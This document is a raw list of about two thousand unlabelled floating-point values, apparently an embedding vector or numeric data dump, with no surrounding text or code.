-0.0049910168163478374, -0.005950828082859516, 0.0019004257628694177, -0.05414031818509102, 0.024277981370687485, 0.025227323174476624, -0.002237232169136405, -0.039202168583869934, 0.017716364935040474, -0.010994198732078075, 0.007818096317350864, 0.0010078015038743615, 0.021597491577267647, 0.01847025379538536, -0.019405633211135864, 0.028843192383646965, -0.040039822459220886, -0.010847609490156174, -0.032528866082429886, 0.01373751275241375, -0.012515935115516186, -0.014198222197592258, 0.012802133336663246, -0.02172314003109932, -0.020522503182291985, -0.017688443884253502, -0.000785736134275794, -0.013960886746644974, 0.01182487141340971, -0.01178996916860342, -0.001321048941463232, 0.01637612096965313, -0.005720473360270262, 0.0153430150821805, 0.003968382254242897, 0.03638207167387009, -0.011266435496509075, -0.01877739280462265, -0.022309496998786926, 0.03160744905471802, -0.0250039491802454, 0.0014449517475441098, -0.0007634860230609775, 0.005483138374984264, 0.0007041522185318172, -0.010889491997659206, -0.03264055401086807, -0.01854005828499794, -0.0031499250326305628, -0.00021464863675646484, 0.005584354512393475, -0.024110451340675354, 0.007510957308113575, -0.015301131643354893, 0.007043267600238323, 0.02445947378873825, -0.01796766184270382, -0.017381304875016212, -0.008858182467520237, -0.011057022027671337, -0.017883896827697754, 0.029848376289010048, 0.006980443373322487, -0.012369345873594284, -0.007678487803786993, -0.009011752903461456, -0.0090187331661582, -0.008976850658655167, 0.00015825974696781486, -0.012781191617250443, 0.02381727285683155, 0.0015243543311953545, -0.014421596191823483, 0.009800542145967484, 0.026749059557914734, 0.014079554006457329, -0.03914632648229599, 0.0017957190284505486, 0.0023279779125005007, 0.019391672685742378, 0.0035390849225223064, 0.0023995274677872658, -0.000863393594045192, -0.0016735612880438566, 0.00024889642372727394, 0.015161522664129734, 0.0019946617539972067, -0.010121642611920834, 0.0326126329600811, -0.024375708773732185, -0.014156339690089226, -0.017311500385403633, 0.0009711541933938861, -0.015370936132967472, -0.02196047455072403, -0.019070571288466454, -0.008969869464635849, -0.011036081239581108, -0.02462700381875038, 0.01486834418028593, 0.07187064737081528, 0.02412441186606884, -0.025688031688332558, -0.0060276128351688385, -0.008907046169042587, -0.0008036235230974853, 0.00037410814547911286, 0.004408149980008602, 0.0055285110138356686, -0.02215592749416828, 0.005483138374984264, 0.02540881372988224, -0.02158353105187416, -0.004094030242413282, 0.015384897589683533, 0.01199240144342184, -0.0029282961040735245, 0.012118049897253513, 0.012285580858588219, -0.003863675519824028, 0.0018026995239779353, 0.018819276243448257, 0.005451726261526346, 0.001283528981730342, -0.011608477681875229, -0.0024902732111513615, -0.017004359513521194, -0.00009140017937170342, -0.007859978824853897, 0.00762962456792593, -0.023901037871837616, 0.008823280222713947, -0.007811116054654121, -0.009549246169626713, 0.002511214464902878, 0.013723551295697689, 0.022100083529949188, -0.007657546550035477, -0.022826049476861954, -0.01150377094745636, -0.0018114250851795077, -0.020578347146511078, 0.019852381199598312, -0.021737100556492805, -0.0031394544057548046, -0.018763432279229164, 0.017534874379634857, 0.02022932469844818, -0.014037671498954296, 0.018149152398109436, -0.00795072503387928, -0.004292972851544619, 0.00560878636315465, 0.04124046117067337, -0.0173952654004097, 0.008432375267148018, 0.009158342145383358, -0.008739515207707882, -0.028103265911340714, -0.00823692325502634, -0.0013350098161026835, 0.017311500385403633, 0.009409638121724129, 0.013332647271454334, 0.027279572561383247, 0.0186796672642231, -0.006655852776020765, 0.005392392631620169, -0.0186796672642231, 0.040989164263010025, 0.025562383234500885, 0.026316272094845772, 0.0004439125768840313, -0.02649776265025139, -0.008132216520607471, 0.043557967990636826, 0.015538467094302177, 0.01150377094745636, -0.005322588142007589, -0.024305904284119606, 0.026749059557914734, 0.03470676392316818, -0.011343220248818398, 0.0015025404281914234, -0.008788377977907658, -0.012299541383981705, 0.005500589497387409, -0.016264433041214943, 0.004418620839715004, -0.0008058049133978784, -0.007573781069368124, 0.00950736366212368, 0.021025095134973526, -0.025604266673326492, 0.014407635666429996, 0.003720576409250498, 0.02462700381875038, -0.0045826612040400505, -0.018163112923502922, 0.0005427294527180493, -0.012334443628787994, -0.007957705296576023, 0.0005169890937395394, 0.013891082257032394, -0.02659549005329609, 0.011496790684759617, 0.0024187236558645964, 0.03130031004548073, -0.0045896414667367935, -0.0025949799455702305, -0.033143144100904465, -0.027293533086776733, -0.004551249090582132, -0.027251651510596275, -0.03660544380545616, 0.020815681666135788, 0.015496584586799145, -0.013528099283576012, 0.005776316858828068, -0.009723757393658161, -0.030490577220916748, -0.01786993443965912, 0.04587547481060028, -0.0013524609385058284, 0.005127135664224625, 0.016697220504283905, 0.008104294538497925, -0.008732534945011139, 0.030686030164361, 0.009277009405195713, 0.026441920548677444, 0.02010367624461651, 0.024166295304894447, -0.016725141555070877, 0.00886516273021698, -0.016418002545833588, 0.006962992250919342, 0.000871682888828218, -0.0024798025842756033, 0.008823280222713947, -0.003968382254242897, 0.014002769254148006, 0.022267615422606468, -0.004195246379822493, 0.003587947925552726, 0.01266950462013483, -0.013744493015110493, 0.0005968278856016695, 0.0205085426568985, 0.044842369854450226, -0.00461058272048831, -0.03649375960230827, 0.027014315128326416, 0.03099316917359829, 0.005713493097573519, -0.008809319697320461, 0.0026281368918716908, -0.017814092338085175, -0.016027098521590233, -0.0016151000745594501, 0.015049835667014122, 0.0032668474595993757, 0.010212388820946217, 0.008872143924236298, 0.00891402643173933, 0.0013515884056687355, 0.02331468090415001, 0.008488219231367111, -0.012627622112631798, -0.02873150445520878, 0.0058670626021921635, 0.03786192461848259, -0.039090484380722046, 0.004823486320674419, 0.010386900044977665, 0.004607092589139938, -0.025283165276050568, 0.029932141304016113, -0.008153158240020275, 0.011845812201499939, 0.013213979080319405, 0.015719957649707794, -0.022951697930693626, -0.004949134308844805, 0.010980237275362015, -0.024724731221795082, 0.025534462183713913, 0.00379736116155982, -0.03671713173389435, 0.024585122242569923, 0.0023750958498567343, 0.03358989208936691, -0.010324075818061829, -0.04015151038765907, -0.012802133336663246, -0.03805737569928169, -0.0023122718557715416, 0.018246879801154137, 0.030741872265934944, -0.010240310803055763, 0.0035390849225223064, 0.001770414994098246, 0.02923409640789032, -0.009283989667892456, -0.0038497145287692547, -0.016334237530827522, 0.02151372656226158, -0.017046242952346802, -0.015175484120845795, 0.006676794029772282, 0.006561616901308298, 0.012369345873594284, 0.011098905466496944, -0.0022738794796168804, 0.012069187127053738, -0.023063385859131813, -0.014924188144505024, 0.004949134308844805, 0.012125030159950256, -0.018023505806922913, 0.005828670226037502, -0.008760456927120686, 0.01558034960180521, -0.014435556717216969, -0.02074587717652321, 0.03981645032763481, 0.008997791446745396, -0.021025095134973526, -0.007043267600238323, 0.013186058029532433, 0.0032860436476767063, 0.0013419901952147484, 0.011699222959578037, 0.010282193310558796, 0.005340039264410734, -0.01209710817784071, -0.034902218729257584, 0.004114971496164799, 0.013912023976445198, -0.021946514025330544, -0.03146784007549286, 0.0010592823382467031, -0.02006179466843605, -0.0011535183293744922, -0.0016753064701333642, -0.00029448745772242546, 0.013618845492601395, -0.02074587717652321, 0.0007726478506810963, -0.018386488780379295, -0.03213796019554138, -0.003525123931467533, 0.01011466234922409, 0.011915616691112518, -0.014533283188939095, 0.006474361289292574, 0.004523327108472586, 0.013290763832628727, 0.02561822719871998, -0.007078169845044613, 0.01613878458738327, 0.0033453775104135275, -0.021834826096892357, 0.0006766667356714606, -0.023719547316432, -0.005982240196317434, -0.022421184927225113, -0.006121848709881306, 0.011091924272477627, -0.011971460655331612, -0.03197043016552925, 0.005490118637681007, -0.0028131187427788973, -0.024557199329137802, -0.02331468090415001, -0.0013611864997074008, -0.024096490815281868, 0.007776213809847832, -0.002005132380872965, 0.003825282910838723, 0.01958712376654148, 0.046880658715963364, 0.006784990895539522, -0.03501390293240547, -0.010421802289783955, 0.01238330639898777, -0.005566903855651617, -0.0024012725334614515, 0.028200991451740265, -0.028815271332859993, -0.018833236768841743, 0.00433136522769928, -0.02134619653224945, -0.013507157564163208, 0.008509160950779915, -0.015049835667014122, -0.02182086557149887, 0.004949134308844805, 0.0048479181714355946, -0.011580555699765682, 0.006369654554873705, 0.031858742237091064, 0.014170300215482712, 0.00994713231921196, -0.03640999272465706, 0.01844233088195324, -0.027195807546377182, -0.017143968492746353, -0.00734342634677887, 0.010721961036324501, 0.008530101738870144, 0.0005405480624176562, -0.020564386621117592, -0.008606886491179466, -0.0050957235507667065, -0.000530077435541898, 0.009563207626342773, 0.018930962309241295, -0.008774417452514172, -0.01580372452735901, -0.005315607879310846, 0.008292767219245434, -0.014826461672782898, -0.022546831518411636, 0.002315761987119913, 0.012278599664568901, 0.01870758831501007, -0.0029073546174913645, 0.005884513724595308, -0.02348221093416214, 0.008146177046000957, 0.015077757649123669, 0.004648975096642971, 0.01701832190155983, 0.013877121731638908, -0.0029893747996538877, 0.007936764508485794, -0.021053018048405647, -0.015747880563139915, 0.007943744771182537, -0.013807317242026329, 0.013500177301466465, -0.010624234564602375, 0.002865472109988332, -0.00008289276593131945, 0.002193604363128543, 0.011133807711303234, -0.0018445821478962898, -0.002614176133647561, -0.005640198476612568, -0.02286793291568756, 0.014672892168164253, -0.0027904321905225515, -0.004722270183265209, -0.016906633973121643, 0.02256079390645027, 0.0054726675152778625, 0.007266641594469547, 0.00893496721982956, -0.025869524106383324, -0.014854383654892445, -0.0027921772561967373, -0.010868550278246403, -0.0053540002554655075, -0.004073088523000479, 0.010673098266124725, 0.02547861821949482, -0.00952132511883974, 0.01021936908364296, -0.009025713428854942, 0.008362570777535439, 0.004554739221930504, 0.008215981535613537, 0.0026229016948491335, 0.02364974282681942, -0.009207204915583134, 0.026204584166407585, 0.000004669534973800182, -0.0157618410885334, -0.018177075311541557, 0.002005132380872965, -0.0011334494920447469, -0.014728735201060772, 0.010666118003427982, -0.014421596191823483, 0.027084119617938995, -0.01138510275632143, -0.022253653034567833, -0.008313708007335663, 0.023803312331438065, -0.007252680603414774, -0.006397576536983252, 0.004554739221930504, 0.015077757649123669, 0.011545653454959393, -0.015678076073527336, 0.01972673274576664, -0.0005929014296270907, -0.02707015909254551, -0.015496584586799145, -0.005682080984115601, 0.010121642611920834, -0.01687871292233467, 0.017102086916565895, 0.02239326201379299, 0.028954878449440002, 0.0025513521395623684, -0.019363749772310257, 0.01851213537156582, -0.0007630496984347701, 0.013674688525497913, -0.005046860780566931, -0.0009013497619889677, -0.004593131598085165, -0.017506951466202736, -0.023189032450318336, -0.0217929445207119, 0.02022932469844818, -0.013465275056660175, 0.017241695895791054, -0.033785346895456314, 0.02175106108188629, -0.01773032546043396, -0.023831233382225037, -0.006711696274578571, -0.001776522840373218, 0.008041471242904663, -0.007524917833507061, -0.016320277005434036, 0.018623823300004005, 0.024319864809513092, 0.033785346895456314, -0.008921006694436073, 0.004003284499049187, 0.020410817116498947, 0.008076373487710953, -0.018554018810391426, -0.003298259573057294, -0.004823486320674419, 0.005392392631620169, 0.024166295304894447, -0.01958712376654148, -0.010519527830183506, 0.0010968021815642715, -0.02852209098637104, -0.02861981838941574, -0.00798562727868557, 0.01551054511219263, -0.019573163241147995, -0.023119227960705757, 0.027056198567152023, 0.005650668870657682, -0.005685571115463972, 0.017241695895791054, 0.006404556799679995, -0.003601908916607499, -0.0034396133851259947, 0.008781397715210915, 0.011126826517283916, -0.0026909608859568834, 0.013877121731638908, 0.0025565873365849257, 0.0182329174131155, 0.017130007967352867, 0.013290763832628727, 0.003179592080414295, -0.02835456095635891, 0.003919519018381834, 0.0029125900473445654, -0.02127639204263687, 0.008788377977907658, 0.013828258030116558, 0.012913820333778858, 0.0017739051254466176, -0.017143968492746353, -0.02229553647339344, 0.0005348764825612307, -0.009444540366530418, 0.007755272556096315, -0.011552633717656136, 0.0005889749154448509, -0.010086740367114544, 0.0026333723217248917, -0.0021342705003917217, -0.01429594773799181, 0.024543238803744316, 0.02364974282681942, 0.00397536251693964, -0.01955920271575451, -0.0009824973531067371, -0.00911645870655775, -0.009165322408080101, -0.00521788140758872, -0.0007054610759951174, -0.012292561121284962, 0.010030897334218025, -0.01429594773799181, 0.022923776879906654, -0.015049835667014122, -0.004401169717311859, -0.012069187127053738, -0.010233329609036446, 0.010093721561133862, 0.005326078273355961, -0.015524506568908691, -0.017855973914265633, -0.011210592463612556, 0.007413230836391449, -0.0025443716440349817, 0.003137709340080619, 0.016906633973121643, -0.0009528305381536484, 0.011406044475734234, -0.006519733928143978, 0.03135615214705467, -0.0022791146766394377, -0.013151155784726143, -0.0012966173235327005, -0.007538878824561834, -0.010198427364230156, -0.00795072503387928, -0.009667914360761642, -0.026162702590227127, -0.009674894623458385, 0.008655750192701817, 0.010994198732078075, 0.008411434479057789, 0.02094133011996746, -0.015622232109308243, 0.009989014826714993, -0.006753578782081604, -0.0053609805181622505, -0.005060821305960417, 0.004715289454907179, -0.01766052097082138, 0.003964891657233238, 0.012760250829160213, 0.001977210631594062, -0.0015514035476371646, 0.014798539690673351, -0.0013664218131452799, -0.0153430150821805, 0.01402371097356081, 0.006006671581417322, -0.010624234564602375, -0.015147562138736248, -0.006474361289292574, -0.02250494994223118, -0.00738530931994319, -0.003048708662390709, -0.0039718723855912685, -0.0059159258380532265, -0.005245803389698267, 0.0007748292409814894, -0.01927998475730419, 0.0019335828255861998, 0.017283577471971512, 0.01177600771188736, -0.02378935180604458, -0.00886516273021698, 0.012299541383981705, -0.003926499281078577, 0.017283577471971512, -0.01837252639234066, 0.004062618128955364, 0.01992218568921089, 0.007790174800902605, 0.008467277511954308, 0.011126826517283916, -0.0114898094907403, -0.010037877596914768, 0.006610480137169361, -0.010386900044977665, -0.013444334268569946, -0.015301131643354893, 0.009619050659239292, -0.01241820864379406, -0.0268328245729208, -0.0004956114571541548, -0.005437765270471573, -0.012857976369559765, 0.004292972851544619, -0.014993992634117603, 0.0006064260378479958, -0.0017887386493384838, -0.010624234564602375, 0.005123645532876253, -0.023398445919156075, -0.02598121017217636, -0.01773032546043396, 0.01863778382539749, 0.02419421635568142, -0.010030897334218025, 0.01502191461622715, 0.0019580144435167313, -0.01749299094080925, 0.0019684850703924894, -0.0010706254979595542, -0.002581018954515457, 0.012906840071082115, -0.020285168662667274, 0.021402038633823395, 0.00383226340636611, -0.012292561121284962, 0.00299810036085546, 0.013856180012226105, 0.013479236513376236, 0.007615663576871157, 0.008606886491179466, -0.01820499636232853, 0.008606886491179466, -0.024878300726413727, -0.0033575932029634714, 0.01143396645784378, -0.0002848893345799297, -0.01948939822614193, 0.011050041764974594, 0.019391672685742378, 0.008425395004451275, -0.03244509920477867, 0.010973257012665272, 0.0046873679384589195, -0.016250472515821457, 0.002759020309895277, 0.021304313093423843, 0.0020801720675081015, 0.015845606103539467, -0.01708812639117241, 0.012899859808385372, -0.012850996106863022, 0.011231533251702785, 0.01651572994887829, -0.009381716139614582, 0.003898577531799674, -0.0019894263241440058, 0.05458706617355347, -0.014966070652008057, -0.01146886870265007, 0.008250883780419827, -0.015384897589683533, -0.010317095555365086, -0.02973668836057186, 0.0017695424612611532, -0.004233638755977154, 0.00010819687304319814, -0.009891288354992867, 0.020396854728460312, 0.012564797885715961, -0.0005780679639428854, -0.01402371097356081, 0.004272031597793102, -0.0037938710302114487, -0.003249396337196231, 0.0065895384177565575, -0.009046654216945171, -0.00713750347495079, 0.007120052352547646, -0.01239726785570383, -0.01463100966066122, -0.008774417452514172, 0.003275573020800948, 0.013967867009341717, -0.004292972851544619, -0.003898577531799674, 0.024515317752957344, 0.04341835901141167, -0.007720370311290026, 0.01680890843272209, 0.001427500625140965, -0.0013629315653815866, -0.0024588610976934433, -0.00046943483175709844, -0.009346813894808292, 0.009088537655770779, 0.0032842985820025206, 0.0013123233802616596, 0.019615046679973602, -0.03085356019437313, -0.025688031688332558, -0.010261251591145992, -0.009982033632695675, -0.010198427364230156, 0.012627622112631798, -0.0015461682341992855, -0.01630631648004055, -0.027530869469046593, 0.0188751183450222, 0.002631627256050706, 0.007601703051477671, 0.010903452523052692, 0.0017294049030169845, -0.01373751275241375, 0.01671118102967739, -0.00984242558479309, -0.007144483737647533, -0.017437146976590157, -0.006362674292176962, 0.016082942485809326, -0.006921109743416309, 0.012006362900137901, 0.00947246141731739, -0.007081659976392984, 0.006771029904484749, 0.010721961036324501, -0.010247291065752506, 0.0013908533146604896, 0.026413997635245323, -0.013891082257032394, 0.004910741932690144, -0.022546831518411636, 0.006558126769959927, 0.04394887015223503, 0.002553097205236554, -0.007517937570810318, 0.012152952142059803, 0.012837035581469536, -0.016222549602389336, 0.013730532489717007, 0.028340600430965424, 0.017437146976590157, -0.0022424673661589622, 0.01894492283463478, -0.0018393468344584107, -0.014533283188939095, -0.0065336949191987514, 0.019447514787316322, -0.002181388670578599, -0.03557233884930611, -0.001327156787738204, 0.005015448667109013, 0.03724764660000801, 0.003902067895978689, 0.019266024231910706, 0.03183082118630409, -0.000022195628844201565, -0.011594516225159168, -0.01218087412416935, -0.01715792901813984, 0.023119227960705757, -0.02831267938017845, 0.013388490304350853, -0.014505361206829548, -0.01486834418028593, -0.013430372811853886, -0.005235332529991865, 0.0035355945583432913, 0.005940357223153114, 0.009695836342871189, -0.023454289883375168, -0.002027818700298667, 0.005713493097573519, 0.00024933271924965084, 0.021206587553024292, 0.021429961547255516, 0.03406456485390663, -0.01177600771188736, 0.0018166603986173868, -0.00045896414667367935, 0.005113174673169851, -0.012816093862056732, 0.020592307671904564, -0.01627839356660843, -0.0021674276795238256, 0.013688649982213974, -0.015133601613342762, 0.010966276749968529, 0.009751679375767708, -0.04221772029995918, -0.009011752903461456, 0.0012529896339401603, 0.004802545066922903, -0.0019196219509467483, 0.013576962053775787, -0.027865929529070854, -0.005340039264410734, -0.015301131643354893, 0.025115635246038437, 0.016571572050452232, -0.012243697419762611, 0.005772826727479696, -0.017814092338085175, 0.0026473330799490213, -0.009528305381536484, 0.010365958325564861, 0.007678487803786993, 0.010596313513815403, -0.00023777135356795043, 0.0011037825606763363, 0.0280194990336895, -0.013402451761066914, 0.004059127997606993, -0.004446542356163263, -0.002526920521631837, 0.010659136809408665, 0.006690755020827055, -0.015105679631233215, -0.010784785263240337, 0.028298716992139816, 0.012152952142059803, 0.0014117946848273277, -0.004900271072983742, -0.012683466076850891, 0.01011466234922409, 0.019266024231910706, 0.018414409831166267, 0.00802052952349186, 0.017814092338085175, -0.006722167134284973, 0.022086123004555702, -0.010163526050746441, -0.00987732782959938, 0.0037519882898777723, -0.013318685814738274, -0.011447926983237267, -0.003310475265607238, 0.008453316986560822, -0.008997791446745396, 0.03199835121631622, 0.021025095134973526, 0.004090539645403624, 0.005975259467959404, 0.007580761332064867, 0.013821277767419815, -0.03579571470618248, -0.006914129015058279, -0.0114898094907403, 0.016110863536596298, -0.0007839910686016083, -0.004819996189326048, -0.01915433630347252, -0.02108093909919262, -0.020787760615348816, 0.0042126975022256374, -0.043557967990636826, -0.006481341551989317, -0.00020319635223131627, -0.020424777641892433, -0.019433554261922836, -0.022546831518411636, -0.006163731683045626, -0.008739515207707882, -0.01345131453126669, 0.014205202460289001, 0.008174099028110504, 0.002825334435328841, -0.010191447101533413, -0.019363749772310257, -0.006823383271694183, -0.0050817630253732204, -0.014463478699326515, 0.023845193907618523, -0.0066942451521754265, -0.006121848709881306, 0.014854383654892445, 0.015845606103539467, 0.0011229788651689887, -0.014393674209713936, -0.014575165696442127, -0.008292767219245434, -0.004565210081636906, 0.005273724906146526, -0.01245311088860035, 0.03869957849383354, -0.012355384416878223, 0.008809319697320461, -0.017241695895791054, -0.009388696402311325, -0.00795072503387928, -0.001232920796610415, 0.02077380008995533, -0.013402451761066914, 0.018051426857709885, 0.013004566542804241, 0.0010592823382467031, -0.006369654554873705, 0.0006103524938225746, -0.014714774675667286, -0.01870758831501007, -0.021625414490699768, 0.01430990919470787, 0.014505361206829548, -0.004240619484335184, -0.010798745788633823, -0.0007861724589020014, -0.007322485093027353, -0.02324487641453743, -0.010212388820946217, 0.005671610124409199, -0.03035096824169159, -0.007053737994283438, -0.013297745026648045, -0.006013651844114065, -0.001742493244819343, 0.01634819805622101, 0.005929886829108, 0.011985421180725098, -0.029206175357103348, -0.03783400356769562, 0.0013131959130987525, 0.03208211809396744, 0.00890006497502327, 0.0038078317884355783, 0.022686440497636795, 0.016836829483509064, 0.02324487641453743, -0.002921315608546138, 0.0003158650652039796, -0.018191035836935043, -0.013786375522613525, 0.018386488780379295, 0.02443155273795128, 0.008209001272916794, -0.0010959296487271786, -0.015119640156626701, 0.034260015934705734, 0.025562383234500885, -0.01157357543706894, -0.015817685052752495, 0.0006182055221870542, 0.012837035581469536, 0.024613043293356895, 0.021290352568030357, -0.002657803939655423, 0.016013137996196747, -0.00866273045539856, 0.0017573266522958875, -0.014980031177401543, 0.01419124100357294, 0.0033732992596924305, 0.004607092589139938, -0.008188060484826565, -0.002059230813756585, 0.0005597443087026477, 0.009004771709442139, -0.03911840543150902, -0.007053737994283438, 0.006261457689106464, -0.03135615214705467, -0.020285168662667274, -0.011245494708418846, 0.018581939861178398, -0.017548834905028343, 0.004338345490396023, -0.01962900720536709, 0.007301543839275837, 0.003181337146088481, -0.004921212792396545, 0.013674688525497913, -0.0014196477131918073, 0.026302311569452286, -0.017939738929271698, 0.01495211012661457, -0.0195173192769289, 0.0015060306759551167, 0.011999382637441158, 0.003996303770691156, 0.011175690218806267, -0.002493763342499733, 0.019503358751535416, -0.02790781296789646, 0.005647178739309311, -0.010687058791518211, 0.012913820333778858, 0.00021824792202096432, 0.020899446681141853, -0.008781397715210915, 0.006345223169773817, 0.006191653199493885, 0.0010112917516380548, 0.010547449812293053, -0.01436575222760439, -0.006683774758130312, 0.004662936087697744, -0.0066942451521754265, -0.011803929693996906, 0.013723551295697689, -0.01664137654006481, -0.007971666753292084, -0.01782805286347866, 0.001849817461334169, 0.01138510275632143, -0.00044456697651185095, -0.040682025253772736, -0.0022791146766394377, -0.0010139093501493335, -0.0268328245729208, -0.013339627534151077, 0.0030015907250344753, 0.01454724371433258, -0.01427500694990158, 0.022379301488399506, -0.02189067006111145, 0.027209768071770668, -0.011950518935918808, -0.004149873740971088, 0.012125030159950256, -0.012125030159950256, 0.01644592545926571, 0.012055225670337677, -0.026204584166407585, -0.010770823806524277, -0.028438325971364975, -0.006376635283231735, 0.010714980773627758, -0.0337015800178051, -0.02476661279797554, -0.00727362185716629, 0.004066108260303736, -0.01486834418028593, 0.00893496721982956, 0.005245803389698267, 0.017171891406178474, -0.0026229016948491335, -0.0164040420204401, 0.01082666777074337, 0.03143991529941559, 0.004062618128955364, 0.010351997800171375, -0.010840628296136856, -0.008893084712326527, 0.005189959891140461, 0.02531108818948269, 0.012997585348784924, -0.005682080984115601, -0.01786993443965912, -0.0008738642791286111, -0.010128623805940151, -0.019698811694979668, -0.0255484227091074, 0.014072573743760586, -0.0022511929273605347, -0.0008533592335879803, 0.004146383609622717, 0.00207668193615973, 0.007587742060422897, -0.01495211012661457, -0.010338036343455315, 0.011001178994774818, 0.018163112923502922, 0.014463478699326515, -0.022756244987249374, 0.019573163241147995, -0.029038645327091217, 0.02476661279797554, 0.00986336637288332, 0.006142790429294109, -0.021806905046105385, 0.00510968454182148, 0.0017163165612146258, 0.028982801362872124, -0.009570187889039516, 0.01502191461622715, -0.0186796672642231, -0.013172096572816372, -0.002664784202352166, -0.0005566903855651617, 0.029317861422896385, 0.020759839564561844, -0.022588714957237244, 0.013486216776072979, -0.017339421436190605, -0.00198768125846982, 0.017171891406178474, -0.0024169785901904106, 0.0230773463845253, 0.006704716011881828, -0.007859978824853897, 0.002991120098158717, -0.021136783063411713, 0.0027956676203757524, -0.004345326218754053, 0.0018288762075826526, -0.040793709456920624, 0.007144483737647533, 0.004107990767806768, -0.0027904321905225515, -0.003165631089359522, -0.00041446383693255484, 0.020620230585336685, -0.007259661331772804, -0.015817685052752495, -0.000705024809576571, 0.012550837360322475, 0.006163731683045626, 0.006380125414580107, -0.00303300260566175, -0.025366932153701782, -0.008027509786188602, 0.0022721344139426947, 0.015203406102955341, -0.007238719612360001, 0.0030347476713359356, 0.009982033632695675, 0.02702827751636505, -0.00947246141731739, 0.0003243724931962788, -0.010721961036324501, 0.00493168318644166, 0.003142944537103176, 0.003191807772964239, -0.012034284882247448, 0.009297950193285942, 0.025771796703338623, 0.0018445821478962898, -0.015287171117961407, 0.0011037825606763363, -0.02290981449186802, 0.015719957649707794, 0.007364367600530386, -0.003554790746420622, -0.020578347146511078, -0.01143396645784378, 0.0090187331661582, -0.002026073634624481, -0.007203817833214998, -0.002687470754608512, -0.005172508768737316, -0.022518910467624664, 0.005650668870657682, -0.006558126769959927, -0.0005885386490263045, -0.013569981791079044, 0.02486434020102024, -0.006456910166889429, 0.002991120098158717, 0.0010575371561571956, 0.0020574857480823994, 0.005392392631620169, 0.0032022783998399973, -0.00975865963846445, 0.0013245391892269254, -0.03467884287238121, 0.004013754893094301, 0.009968073107302189, 0.0036193598061800003, -0.022714363411068916, 0.018930962309241295, 0.002471077023074031, -0.01752091385424137, -0.01630631648004055, 0.010365958325564861, -0.019810497760772705, -0.012648563832044601, -0.03289185091853142, 0.0038287732750177383, -0.001022634911350906, -0.002521685091778636, -0.013465275056660175, 0.025185439735651016, 0.0038287732750177383, -0.0153430150821805, 0.006596519146114588, 0.012732328847050667, -0.006680284161120653, 0.018958885222673416, 0.012885898351669312, -0.001211106893606484, -0.004160344135016203, 0.03495806083083153, -0.013200018554925919, -0.0021534666884690523, -0.009053635410964489, 0.010393880307674408, -0.004669916816055775, -0.012850996106863022, -0.012795153073966503, -0.0005780679639428854, 0.007496996317058802, -0.016362158581614494, -0.00001862360477389302, -0.01444951817393303, -0.017911817878484726, -0.0006587793468497694, 0.02645588107407093, -0.002511214464902878, 0.019615046679973602, -0.01493814866989851, -0.006362674292176962, -0.008188060484826565, 0.0013838729355484247, 0.004914232064038515, -0.02878734841942787, -0.0029562178533524275, 0.008181079290807247, -0.009940151125192642, -0.006613970268517733, -0.0008764819358475506, 0.00016327692719642073, -0.0026612940710037947, 0.00861386675387621, -0.023272797465324402, 0.008997791446745396, 0.01114776823669672, 0.009884308092296124, 0.011294357478618622, -0.016794946044683456, 0.002408253028988838, -0.00767150754109025, 0.020285168662667274, 0.015175484120845795, -0.007762253284454346, -0.011426986195147038, 0.008969869464635849, 0.012969664297997952, 0.007203817833214998, 0.029960062354803085, 0.01525924913585186, 0.006062515079975128, -0.021206587553024292, -0.01678098551928997, 0.007608683314174414, -0.0032127490267157555, -0.021053018048405647, 0.012320482172071934, -0.02091340906918049, -0.02462700381875038, -0.006732637528330088, -0.0023733507841825485, 0.009926190599799156, 0.007113071624189615, -0.0012617151951417327, -0.01620858907699585, -0.005340039264410734, -0.0066942451521754265, -0.004586151335388422, -0.035907402634620667, -0.023663703352212906, -0.019168296828866005, 0.013688649982213974, 0.028982801362872124, -0.005214391276240349, -0.012034284882247448, -0.001732895034365356, 0.005545962136238813, 0.009619050659239292, 0.014107475988566875, -0.0003854513633996248, 0.009814503602683544, -0.0036786936689168215, 0.018456293269991875, -0.006648872513324022, -0.014463478699326515, 0.002975414041429758, -0.0028392954263836145, 0.010303134098649025, 0.014924188144505024, -0.012069187127053738, -0.004401169717311859, 0.010659136809408665, 0.022812088951468468, 0.024920182302594185, -0.010819687508046627, -0.009633012115955353, -0.037610627710819244, 0.012125030159950256, 0.008160138502717018, 0.023091306909918785, -0.003441358683630824, -0.007203817833214998, -0.013507157564163208, 0.003947440534830093, -0.0029998456593602896, 0.0012364110443741083, -0.014980031177401543, -0.008551043458282948, 0.0030661597847938538, 0.002959707984700799, 0.0016796692507341504, 0.00603110296651721, -0.01664137654006481, 0.008844221942126751, -0.008188060484826565, 0.0027119023725390434, 0.012271619401872158, 0.00834162998944521, -0.000871682888828218, 0.007322485093027353, 0.004338345490396023, -0.010358978062868118, -0.005169018171727657, -0.00003825610110652633, -0.020550426095724106, -0.01444951817393303, 0.010142584331333637, -0.031132778152823448, -0.014407635666429996, 0.011545653454959393, -0.006114868447184563, -0.0043662674725055695, 0.003804341657087207, 0.003542575053870678, 0.0192241407930851, 0.016222549602389336, 0.00019665218133013695, 0.006467381026595831, 0.006163731683045626, 0.0051445867866277695, -0.0061951433308422565, 0.004826976452022791, -0.02531108818948269, 0.003484986489638686, -0.020019911229610443, -0.012446130625903606, -0.01891700178384781, 0.004237129352986813, 0.02022932469844818, -0.0020417796913534403, 0.012955702841281891, -0.008369551971554756, -0.0025286655873060226, 0.0000955993527895771, 0.012802133336663246, -0.004949134308844805, -0.003587947925552726, 0.005947337951511145, 0.003804341657087207, -0.009709796868264675, -0.018218956887722015, 0.017604678869247437, -0.0249062217772007, 0.012697426602244377, -0.02274228446185589, 0.003249396337196231, -0.007448133081197739, 0.010770823806524277, 0.014742696657776833, 0.01664137654006481, 0.0021395059302449226, -0.005800748709589243, 0.013611864298582077, 0.004073088523000479, -0.007294563576579094, -0.0017006105044856668, 0.001776522840373218, 0.004893290810286999, -0.00017625620239414275, 0.021876709535717964, 0.031551603227853775, 0.006983933504670858, -0.010456704534590244, 0.01563619263470173, -0.0016203353879973292, -0.00798562727868557, 0.009095517918467522, -0.020690035074949265, -0.020578347146511078, -0.014840423129498959, 0.03358989208936691, -0.015873529016971588, -0.0031848272774368525, -0.016753064468503, -0.00952132511883974, 0.01495211012661457, -0.020173480734229088, -0.0021552119869738817, 0.00922116544097662, -0.006830364000052214, -0.00246584159322083, -0.009681874886155128, -0.02158353105187416, 0.004586151335388422, 0.00986336637288332, -0.0035443201195448637, 0.0010810961248353124, 0.027377299964427948, -0.004219678230583668, 0.001293127192184329, 0.02873150445520878, 0.009465481154620647, 0.029429549351334572, 0.011978440918028355, -0.008397473022341728, -0.01786993443965912, -0.030099671334028244, -0.0015793252969160676, -0.009193244390189648, 0.00497356615960598, 